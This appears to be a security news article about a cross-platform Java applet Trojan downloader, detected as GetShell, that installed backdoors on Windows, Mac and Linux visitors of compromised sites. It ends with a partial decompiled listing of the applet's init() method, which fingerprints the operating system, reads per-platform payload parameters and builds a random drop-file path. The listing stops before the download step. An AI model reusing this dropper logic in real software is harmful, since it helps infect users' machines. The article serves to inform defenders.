A new Trojan downloader has been discovered which detects
your platform, i.e. which operating system you are running, and downloads the
malware built for that platform.
Remember the cross-platform malware that exploited Java to
attack both PCs and Macs?
Here's a better one for you: a Trojan downloader that checks
your operating system and then picks the malware that suits your
PC or Mac.
The new Web-based social engineering attack, first detected
on the Columbia websites, relies on a malicious Java applet to install
backdoors on Windows, Macs and Linux. When you first visit such a compromised
site, the applet checks which operating system you have (Windows,
Mac OS X, Linux) and then drops the corresponding Trojan for your platform.
F-Secure, which first found the Web exploit, detects the
initial malware as Trojan-Downloader:Java/GetShell.A. The respective payloads
for Windows, Mac, and Linux are detected
as follows: Backdoor:W32/GetShell.A, Backdoor:OSX/GetShell.A (PowerPC binary,
requires Rosetta on an Intel-based platform), and Backdoor:Linux/GetShell.A.
All three of them have one purpose: to connect to a Command
and Control (C&C) server and await further instructions. These typically
include downloading additional malware and executing it. The security company
did note, however, that ever since it began monitoring this particular attack,
the C&C server hasn't pushed any additional code.
It appears that the Trojan downloader was written using the
Social-Engineer Toolkit (SET), an open-source and publicly available Python
tool designed for penetration testing. It is very unlikely that this is a
penetration test. Malware writers love using a cross-platform plugin as an
attack vector because it lets them target more than one operating system, and
thus more potential users. It shouldn't surprise you that Java is being used:
the platform has loads of security holes and it runs on all the major operating
systems.
THIS IS THE CODE FOR THE TROJAN DOWNLOADER FOR ALL PLATFORMS (this is the decompiled init() method of the applet; the listing ends before the download logic)
// needs: import java.util.Random; import java.io.File;
public void init()
{
    try
    {
        // Random base-36 string used as the name of the dropped file
        Random localRandom = new Random();
        String str1 = Long.toString(Math.abs(localRandom.nextLong()), 36);
        // Drop directory: the JVM's temporary directory
        String str2 = System.getProperty("java.io.tmpdir") + File.separator;
        String str3 = System.getProperty("java.io.tmpdir") + File.separator;
        // OS fingerprint, lower-cased so the substring checks below work
        String str4 = System.getProperty("os.name").toLowerCase();
        String str5 = System.getProperty("os.arch");
        String str6 = " ";
        String str7 = " ";
        String str8 = " ";
        String str9 = " ";
        String str10 = " ";
        int i = -1;
        if (str4.indexOf("windows") >= 0)
        {
            // Applet <param> tags carry the per-OS payload settings
            str6 = getParameter("WINDOWS");
            str7 = getParameter("STUFF");
            str8 = getParameter("64");
            str9 = getParameter("86");
            str10 = getParameter("ILIKEHUGS");
            i = 0;
            str2 = str2 + str1 + ".exe";
        }
        else if (str4.indexOf("mac") >= 0)
        {
            str6 = getParameter("OSX");
            i = 1;
            if (str2.startsWith("/var/folders/")) str2 = "/tmp/";
            str2 = str2 + str1 + ".bin";
        }
        else if ((str4.indexOf("nix") >= 0) || (str4.indexOf("nux") >= 0))
        {
            str6 = getParameter("Linux");
            i = 2;
            str2 = str2 + str1 + ".bin";
        }
        // the remainder of the method is not reproduced on the page
    }
    catch (Exception localException)
    {
        // catch block assumed for syntactic completeness; not shown in the listing
    }
}